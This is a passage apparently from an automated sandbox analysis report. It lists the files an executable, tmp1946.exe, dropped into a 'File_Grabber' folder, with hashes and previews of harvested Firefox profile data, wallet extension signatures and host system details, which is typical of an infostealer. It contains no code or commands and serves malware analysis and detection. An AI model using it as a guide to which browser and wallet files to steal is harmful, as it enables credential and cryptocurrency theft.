                                                                                      SHA-256:33FACD9836FDB30E3916C74E1AFCBD7A3A209D65F2B5BCF3FD81C7585047C196
                                                                                      SHA-512:1AC6CC78050CFC70EE9A0A46D11EA0F21262036A3359E3BED28D4F3967C9449EA5B8872CC4477E7517BF06B8CD814EB30C0CE5B5F5A32B4970C0E4CDF63FE3BD
                                                                                      Malicious:false
                                                                                      Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.1.2.5.,.2.5.5.0.5.0.8.8.,.1.1.9.,.3.0.0.4.9.2.6.8.,.;.3.7.4.6.3.7.8.,.3.2.9.4.5.8.7.9.9.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\AlternateServices.txt

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):449
                                                                                      Entropy (8bit):5.029503277055257
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:2MQpcNRQSQa+ifNWSncK1U8E0jNN+OUjcK1U8E0Zv:2MucTZTzN/L1U70jjq1U70R
                                                                                      MD5:F8037614637B47FF611C9C997CE0A9A3
                                                                                      SHA1:03E169CB2D0E6D96F6D52A56E6D3A8ABB7E76306
                                                                                      SHA-256:FD3043377696C2D595313757EECCA14A5C75232AD13F4A08F549907321144480
                                                                                      SHA-512:5E9DCBAC46B3DA33FAD146D4DBFF13E7A3C75F67CEEDE98339F04806D5F9877C9590739A3F892E56F9E82B6F93238C37D56627E0B1663DA2332EA0ACE9DF7843
                                                                                      Malicious:false
                                                                                      Preview:https:push.services.mozilla.com:443:.::3.0.19634.https:push.services.mozilla.com:443:push.services.mozilla.com:443::n:1699018838:h3:y:1696426830:n::|n:y:.https:accounts.firefox.com:443:.:^partitionKey=%28about%2Cabout.ef2a7dd5-93bc-417f-a698-142c3116864f.mozilla%29:3.0.19634.https:accounts.firefox.com:443:accounts.firefox.com:443::n:1699018832:h3:y:1696426830:n:^partitionKey=%28about%2Cabout.ef2a7dd5-93bc-417f-a698-142c3116864f.mozilla%29:|n:y:.

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_8[1].txt

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):9
                                                                                      Entropy (8bit):3.169925001442312
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:a7UY:BY
                                                                                      MD5:84D28105C30FBBB30EA753EC5B819FA9
                                                                                      SHA1:9ACA3A45B6A3675BE9D809480BA199CB5DA1FA5B
                                                                                      SHA-256:ECE2D6AAF1D8B1B059C0CA3B074E893A16F7DCB24A9D4C8F8F5BCECBD6BBCAF8
                                                                                      SHA-512:A57A9E31ED629E6C31C78EA15F5FA619A1CAC0DB5BA86AAE78C0CDD738FF54E74182AE882C855E19F73D309AF58C90AE58B937E8203315B7DDE676FE61ADDEBC
                                                                                      Malicious:false
                                                                                      Preview:.z{a:1}

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\Latest.dat

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3::
                                                                                      MD5:93B885ADFE0DA089CDF634904FD59F71
                                                                                      SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                                                      SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                                                      SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                                                      Malicious:false
                                                                                      Preview:.

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\LogFile_October_4_2023__16_5_0.txt

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):281
                                                                                      Entropy (8bit):4.565750799875849
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:qKKO9SWO5v8VWO3jsIqQKzO+CUhqaoaFHZ/PWgrv1KO9SWO5v8VWOtw0ZFq5v:MOix8fYICzO+jhhNZ/ugrkOix8ftw0Zm
                                                                                      MD5:F2852E4405C636842C01BB9304CD25AC
                                                                                      SHA1:044CA87B17D341012C9F42192F0D7A919AED1E23
                                                                                      SHA-256:893244838052D5C93F81D8A3EC0A508BD1631EC5097B5EEA5B47DEFECAF36214
                                                                                      SHA-512:B80768BB52C8D74A402FF2D67A0AF88C704026A3D8E14D10EFE2A222F70F9E586C6A2700E71DEF9692C660549E8812D4E72F962156D703E84B8076004C1CCCCB
                                                                                      Malicious:false
                                                                                      Preview:[000:00:00:000][P][TimerTask][0x00001e88] TimerTask::Run has been invoked...[000:00:00:000][P][BackgroundTaskManager][0x00001e88] BroadcastBackgroundTask: Broadcast background task already registered...[000:00:00:000][P][TimerTask][0x00001e88] TimerTask: Unregistering timer task..

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\ProcessMAU[1].txt

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:H:H
                                                                                      MD5:455831477B82574F6BF871193F2F761D
                                                                                      SHA1:F44217A81173869E08671753C52553646FF5D95B
                                                                                      SHA-256:69BF0BC46F51B33377C4F3D92CAF876714F6BBBE99E7544487327920873F9820
                                                                                      SHA-512:CBC0EE58E447428BDCF72FC8B03C8CFB086EDBB14205B918E75EBEFF1D85FF1DD254E9DCB387AFBD3FA766C803937C306E0A2A79870C0D87ABCB7AB93661CF85
                                                                                      Malicious:false
                                                                                      Preview:****

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\SiteSecurityServiceState.txt

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:CSV text
                                                                                      Category:dropped
                                                                                      Size (bytes):645
                                                                                      Entropy (8bit):5.0140116470944855
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:eHXiNZQnB4c3BiQggQxZRJBX7QFfFBRLsqcQZ/cKlZL5wylrocQ4:eHCaBquwZRJBLQFfFB1cMjCylLf
                                                                                      MD5:5A61B090FCE6A31303B2AD394B24297D
                                                                                      SHA1:50ACD9ED5B156EBEF014395FFDF9B60F5F19220D
                                                                                      SHA-256:F94E428FF1EB7279B97A9110BC0D97D6F43F76558F322E227F001D8EE2CB70A5
                                                                                      SHA-512:502735A0EC38D964888846174BFA0BA17576344CA85CA0601FE2656131F5337493C23A554B34ACAAED2888F2648CDB98BD749AE4082DCF309C2A23688F51B227
                                                                                      Malicious:false
                                                                                      Preview:aus5.mozilla.org.0.19634.1727962832883,1,0.contile.services.mozilla.com.0.19634.1727962832436,1,0.www.mozilla.org^partitionKey=%28https%2Cmozilla.org%29.0.19634.1727962831785,1,0.classify-client.services.mozilla.com.0.19634.1727962835536,1,0.location.services.mozilla.com.0.19634.1727962831793,1,1.incoming.telemetry.mozilla.org.0.19634.1727962832619,1,0.normandy.cdn.mozilla.net.0.19634.1727962834488,1,0.spocs.getpocket.com.0.19634.1759498832535,1,0.shavar.services.mozilla.com^firstPartyDomain=safebrowsing.86868755-6b82-4842-b301-72671a0db32e.mozilla.0.19634.1727962832690,1,1.firefox.settings.services.mozilla.com.0.19634.1727962832352,1,0.

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\System_info.txt

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):357
                                                                                      Entropy (8bit):5.323882816201732
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:muV9oElnAy6FbRNLQqwBEoN923f7zVW2yUiQPMVWK/lAAAB6nglCGyA2J:dVznAy6FFNLQqwBEo6lW210VWKNAAAB4
                                                                                      MD5:23C5BD4299D9011EF005B3ADFCB34C0B
                                                                                      SHA1:38A271D37F80A7269042C34CE725E43D01755448
                                                                                      SHA-256:5D6A7550A958903ECEE77DFB90741E4251385AC86E5A2B5E8D19DFBF74ED6E26
                                                                                      SHA-512:41EB93FC7C783614A258674F2FA6DD42D86CA636C61660C7DDF02560A5C4787A23A05710771FB582568F4A8F544B635305A3DAAD86FB52866FEBACF3E8F6E674
                                                                                      Malicious:false
                                                                                      Preview:User Name: user..Computer Name: 562258..HWID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..Windows Version: 6.2..Install Path: C:\Users\user\AppData\Local\Temp\tmp1946.exe..Processor Architecture: 9..Page Size: 4096..Number of Processors: 4..Processor Type: 8664..RAM Size: 8191 MB..Screen Resolution: 1280 x 1024..System Language: en..BIOS Version: P.......

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\VERSION.txt

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):109
                                                                                      Entropy (8bit):4.634447055914622
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:hMCRSBAUUXKF/iEG71wALYLlXH2V3bbKE:hmBARKF/nGBBYxXWJbKE
                                                                                      MD5:7818AAEDFB7E785A92BEE1FC6F0E3BE4
                                                                                      SHA1:B4699D481B16CD941D59411931193FA0DA2930FA
                                                                                      SHA-256:1AF71C9AA74DFDF29E9E59F4FC4233CD281A1C813493C11AECF57C34A4847662
                                                                                      SHA-512:DE3F42FBDDD90E118D57ED96E7D56B8D1483916F83626DAC7FD2541A1F48D58C58CE070B87D2DAA5AEAA346A3BC696042F675BD2D28938304F8561D24088ED7D
                                                                                      Malicious:false
                                                                                      Preview:This is the model for the Browsing Topics Privacy Sandbox feature...Model Version: 0001.Taxonomy Version: v1.

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\hub-signature.txt

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:ASCII text, with very long lines (975), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):975
                                                                                      Entropy (8bit):5.761205683904012
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:UfDTQedu+/O7dZkNhFCzgQxDLM8x1OJNl/foKuehOcC:U7TQedu+/O7dZFgMDOJNFPhOD
                                                                                      MD5:DB7C7DCA873D7D732E570B272B16FA17
                                                                                      SHA1:4A26E57A5C88663F8135F17537DD8AC0597F005B
                                                                                      SHA-256:539D7F4F275098780B3CBB100210F1C7912B7C7BE384BCDAB57C2FE3DB027EDD
                                                                                      SHA-512:A2F9B789ECD61F4AAE7A54F5F7E94701D347D20FC073066716D8F5EBAFC534194370109EA5057C2AC69426C8B0C50698415ED372BCBDAA432B37F25499688306
                                                                                      Malicious:false
                                                                                      Preview:eyJhcHAtc2V0dXAuanMiOiJQbjRNZDJISEVHT2EyOUV3Ym43RzJHT0FPWU1jdDVLQnc4aGU2TjNBSG00PSIsImNyeXB0by5idW5kbGUuanMiOiJYNjU2R29UZ0dKVko5VVZZMVFWaW9rVGIrOW9Oako4TGtlaU1MRGFZL3FNPSIsImxvYWQtaHViLWkxOG4uYnVuZGxlLmpzIjoidUpZUHBpanhuaVJBVGs3NmJWdzltWmYzUGFQWldtNnAzc0hxczAwRWY0WT0iLCJtYW5pZmVzdC53ZWJhcHAuanNvbiI6IkJ3ZHV5NkNsdUsvR09icUJvNjRkOEpTcTFPOEZXTzlVeUdieTF0cktRRTA9IiwicnVudGltZS5idW5kbGUuanMiOiJTUEVFL3ExcWxRaHQ1TG44bEs5YzIzdG9CQ1FyNTNtandKY2VuejFkOHFZPSIsInZlbmRvci5idW5kbGUuanMiOiJJVHNycXcwK1hsK0NNUGMyL0QvbnFER21vWjk2WVl0bC9ta29kR0Z4aXNNPSIsIndhbGxldC1jcnlwdG8uaHRtbCI6ImpLYlVHa2ZzZkVmWkpEYyt0N1lTdGE0QnpycE00cFIwSjlsOGVndzBYTGs9Iiwid2FsbGV0LWljb24uc3ZnIjoiVVlpSy9zR1dWSUpPakVvQ2srWkRHZUxXMzFsRURUemlDSGU2d3RaQVRaQT0iLCJ3YWxsZXQuYnVuZGxlLmpzIjoiVlo3RnhzNVIvZHVEMXJNMGdPUi9hay80VDJ4QXgxbHh5RkwrREVkV1hXOD0iLCJ3YWxsZXQuaHRtbCI6Ik1uTG9oU08vcTVzMkVuWGEzdFhSK0FrRHhycUFUdWQwaXZYN1lydHYwTFE9In0=.e2mRaJdMQuCKD+0Cwj5huurciWFUB/NShsVDvZajZxaIedT58EsvbiD8lZcA6fn1Y2oG2vgt3D+OaaeXPlT7sw

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\iconcache_1280.db

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):24
                                                                                      Entropy (8bit):1.6368421881310118
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:5l:7
                                                                                      MD5:2DD3F3C33E7100EC0D4DBBCA9774B044
                                                                                      SHA1:B254D47F2B9769F13B033CAE2B0571D68D42E5EB
                                                                                      SHA-256:5A00CC998E0D0285B729964AFD20618CBAECFA7791FECDB843B535491A83AE21
                                                                                      SHA-512:C719D8C54A3A749A41B8FC430405DB7FCDE829C150F27C89015793CA06018AD9D6833F20AB7E0CFDA99E16322B52A19C080E8C618F996FC8923488819E6E14BB
                                                                                      Malicious:false
                                                                                      Preview:CMMM ...................

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\iconcache_1920.db

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):24
                                                                                      Entropy (8bit):1.6368421881310118
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:A/lll:A/
                                                                                      MD5:635E15CB045FF4CF0E6A31C827225767
                                                                                      SHA1:F1EAAA628678441481309261FABC9D155C0DD6CB
                                                                                      SHA-256:67219E5AD98A31E8FA8593323CD2024C1CA54D65985D895E8830AE356C7BDF1D
                                                                                      SHA-512:81172AE72153B24391C19556982A316E16E638F5322B11569D76B28E154250D0D2F31E83E9E832180E34ADD0D63B24D36DD8A0CEE80E8B46D96639BFF811FA58
                                                                                      Malicious:false
                                                                                      Preview:CMMM ...................

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\iconcache_2560.db

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):24
                                                                                      Entropy (8bit):1.6368421881310118
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:lX:1
                                                                                      MD5:2D84AD5CFDF57BD4E3656BCFD9A864EA
                                                                                      SHA1:B7B82E72891E16D837A54F94960F9B3C83DC5552
                                                                                      SHA-256:D241584A3FD4A91976FAFD5EC427E88F6E60998954DEC39E388AF88316AF3552
                                                                                      SHA-512:0D9BC1EE51A4FB91B24E37F85AFBF88376C88345483D686C6CFF84066544287C98534AA701D7D4D52E53F10A3BEA73EE8BC38D18425FDE6D66352F8B76C0CBB5
                                                                                      Malicious:false
                                                                                      Preview:CMMM ...................

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\iconcache_768.db

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):24
                                                                                      Entropy (8bit):1.6368421881310118
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Wtl:WX
                                                                                      MD5:D192F7C343602D02E3E020807707006E
                                                                                      SHA1:82259C6CB5B1F31CC2079A083BC93C726BFC4FBF
                                                                                      SHA-256:BB4D233C90BDBEE6EF83E40BFF1149EA884EFA790B3BEF496164DF6F90297C48
                                                                                      SHA-512:AEC90CF52646B5B0EF00CEB2A8D739BEFE456D08551C031E8DEC6E1F549A6535C1870ADB62EEC0A292787AE6A7876388DD1B2C884CBA8CC6E2D7993790102F43
                                                                                      Malicious:false
                                                                                      Preview:CMMM ...................

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\iconcache_96.db

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):24
                                                                                      Entropy (8bit):1.6368421881310118
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:s:s
                                                                                      MD5:2A8875D2AF46255DB8324AAD9687D0B7
                                                                                      SHA1:7A066FA7B69FB5450C26A1718B79AD27A9021CA9
                                                                                      SHA-256:54097CCCAE0CFCE5608466BA5A5CA2A3DFEAC536964EEC532540F3B837F5A7C7
                                                                                      SHA-512:2C39F05A4DFFD30800BB7FBB3FF2018CF4CC96398460B7492F05CE6AFD59079FD6E3EB7C4F8384A35A954A22B4934C162A38534AD76CFB2FD772BCF10E211F7C
                                                                                      Malicious:false
                                                                                      Preview:CMMM ...................

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\iconcache_custom_stream.db

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):24
                                                                                      Entropy (8bit):1.6368421881310118
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:a/l/:e/
                                                                                      MD5:F732BF1006B6529CFFBA2B9F50C4B07F
                                                                                      SHA1:D3E8D4AF812BBC4F4013C53C4FFAB992D1D714E3
                                                                                      SHA-256:77739084A27CB320F208AC1927D3D9C3CAC42748DBDF6229684EF18352D95067
                                                                                      SHA-512:064D56217AEB2980A3BFAA1E252404613624D600C3A08B5CF0ADCB259596A1C60EE903FDC2650972785E5AE9B7B51890DED01EC4DA7B4DE94EBDA08AEAF662DF
                                                                                      Malicious:false
                                                                                      Preview:CMMM ...................

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\iconcache_exif.db

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):24
                                                                                      Entropy (8bit):1.6368421881310118
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:EX:EX
                                                                                      MD5:FC94FE7BD3975E75CEFAD79F5908F7B3
                                                                                      SHA1:78E7DA8D08E8898E956521D3B1BABBF6524E1DCA
                                                                                      SHA-256:EE1ED3B49720B22D5FDA63D3C46D62A96CA8838C76AB2D2F580B1E7745521AA5
                                                                                      SHA-512:4CEAF9021B30734F4CE8B4D4A057539472E68C0ADD199CF9C3D1C1C95320DA3884CAF46943FC9F7281607AB7FA6476027860EBED8BBAA9C44B3F4056B5E074D3
                                                                                      Malicious:false
                                                                                      Preview:CMMM ...................

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\iconcache_sr.db

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):24
                                                                                      Entropy (8bit):1.6368421881310118
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:6:6
                                                                                      MD5:379523B9F5D5B954E719B664846DBF8F
                                                                                      SHA1:930823EC80B85EDD22BAF555CAD21CDF48F066AA
                                                                                      SHA-256:3C9002CAEDF0C007134A7E632C72588945A4892B6D7AD3977224A6A5A7457BF4
                                                                                      SHA-512:ECA44DE86BBC3309FA6EAB400154D123DCD97DC1DB79554CE58CE2426854197E2365F5EEE42BAC6E6E9455561B206F592E159EF82FAF229212864894E6021E98
                                                                                      Malicious:false
                                                                                      Preview:CMMM ...................

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\iconcache_wide.db

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):24
                                                                                      Entropy (8bit):1.6368421881310118
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:V/l/:/
                                                                                      MD5:5F243BF7CC0A348B6D31460A91173E71
                                                                                      SHA1:5696B34625F027EC01765FC2BE49EFCFD882BF8E
                                                                                      SHA-256:1B1AED169F2ACFAE4CF230701BDA91229CB582FF2CE29A413C5B8FE3B890D289
                                                                                      SHA-512:9E08DFBBF20668B86DF696A0D5969E04E6EE4A67E997FF392099BC7FF184B1B8965502215744BE7FE423668B69099242BBA54DF3F0BFE4E70ACDC7CAD8195B02
                                                                                      Malicious:false
                                                                                      Preview:CMMM ...................

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\iconcache_wide_alternate.db

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):24
                                                                                      Entropy (8bit):1.6368421881310118
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:J:J
                                                                                      MD5:DB7C049E5E4E336D76D5A744C28C54C8
                                                                                      SHA1:A4DB9C8586B9E4FA24416EB0D00F06A9EBD16B02
                                                                                      SHA-256:E8830E7AC4088CF3DD464CAEC33A0035D966A7DE5AE4EFC3580D59A41916FF7B
                                                                                      SHA-512:B614037FB1C7D19D704BF15F355672114D25080223E7EE4424AD2CB7B89782219E7877B373BBC7FA44F3AD8DF8A27EEF4E8CCC765D44EC02A61E3B7FAE88AE69
                                                                                      Malicious:false
                                                                                      Preview:CMMM ...................

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\miniwallet.bundle.js.LICENSE.txt

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):295
                                                                                      Entropy (8bit):4.7070549789727645
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:U03WiGjs/TdMK1OmFsZ1FD+Dm3Jue9DOFTTgGHYVov10:U3kTHwmiCD6JuoqIfov10
                                                                                      MD5:9FADCDA30B07120E2CB70B5A003ACFF9
                                                                                      SHA1:A4EB198C6AE011CFB495A25D7C04B62FDD1D0346
                                                                                      SHA-256:63EC623C2BDA74FC3E3D2796151FFE93255E8BD76B2D8BDFE2EA0B401848B15F
                                                                                      SHA-512:E34A8BCE98AC7EEEB3416A9D2E8F331181A25E06467AA211AF4A12A88CEF0C5B2678792D03378F888C212EFF6340647AC99F97AA2CADB75C3777527FDDF77552
                                                                                      Malicious:false
                                                                                      Preview:/*.object-assign.(c) Sindre Sorhus.@license MIT.*/../** @license React v16.14.0. * react.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\notification_fast.bundle.js.LICENSE.txt

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):295
                                                                                      Entropy (8bit):4.7070549789727645
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:U03WiGjs/TdMK1OmFsZ1FD+Dm3Jue9DOFTTgGHYVov10:U3kTHwmiCD6JuoqIfov10
                                                                                      MD5:9FADCDA30B07120E2CB70B5A003ACFF9
                                                                                      SHA1:A4EB198C6AE011CFB495A25D7C04B62FDD1D0346
                                                                                      SHA-256:63EC623C2BDA74FC3E3D2796151FFE93255E8BD76B2D8BDFE2EA0B401848B15F
                                                                                      SHA-512:E34A8BCE98AC7EEEB3416A9D2E8F331181A25E06467AA211AF4A12A88CEF0C5B2678792D03378F888C212EFF6340647AC99F97AA2CADB75C3777527FDDF77552
                                                                                      Malicious:false
                                                                                      Preview:/*.object-assign.(c) Sindre Sorhus.@license MIT.*/../** @license React v16.14.0. * react.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\pkcs11.txt

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):518
                                                                                      Entropy (8bit):5.385850521177622
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:T4Lwvf1W0hOudhNTf9682LDcGuyXkvsUvE+LK5H4ll:T4Lwvf171zf9JzHVG2D
                                                                                      MD5:8B118CBED24221FA67C30BAB871BD830
                                                                                      SHA1:22C57F5ED56AC7070F0ECE98B99B6F56A8802295
                                                                                      SHA-256:6EF95845CAA60AE9B816B936782E094869AFD2B52EE24CD18F6664E35D5F0286
                                                                                      SHA-512:D7DC51952DB7A21A07BEC139DFD6C076FE0115941385A534524BB1D1F7D3F245E2DF05120D9F6A17F9AC4D191FC14E58471F93FA762F39584B37768733DB0AC8
                                                                                      Malicious:false
                                                                                      Preview:library=..name=NSS Internal PKCS #11 Module..parameters=configdir='sql:C:\\Users\\user\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\v6zchhhv.default-release' certPrefix='' keyPrefix='' secmod='secmod.db' flags=optimizeSpace updatedir='' updateCertPrefix='' updateKeyPrefix='' updateid='' updateTokenDescription='' ..NSS=Flags=internal,critical trustOrder=75 cipherOrder=100 slotParams=(1={slotFlags=[ECC,RSA,DSA,DH,RC2,RC4,DES,RANDOM,SHA1,MD5,MD2,SSL,TLS,AES,Camellia,SEED,SHA256,SHA512] askpw=any timeout=30})....

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\settings.dat

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):280
                                                                                      Entropy (8bit):4.132041621771752
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5Ltll:o1ApdeaEqYsMazlYBVsJDu2ziy5
                                                                                      MD5:A5BB6D3732EFB1F0C13CCB17451A286E
                                                                                      SHA1:4A5CC29F1D332F1781A924381E5B7183CF9928F9
                                                                                      SHA-256:552D03793D7F59EF539D9DC29F37443BED49893078A93B59EE3F54F8F45F849A
                                                                                      SHA-512:2C5EA73A996DAB755F4766611683634DA131735A940CA5628C52BD85E91C59E58E99CFD9B8132C16054007E4AC645937C81893DA063CAA58772B9CB27B421720
                                                                                      Malicious:false
                                                                                      Preview:sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

                                                                                      C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\throttle_store.dat

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):20
                                                                                      Entropy (8bit):3.6219280948873624
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:8g6Vvn:8g6Vv
                                                                                      MD5:9E4E94633B73F4A7680240A0FFD6CD2C
                                                                                      SHA1:E68E02453CE22736169A56FDB59043D33668368F
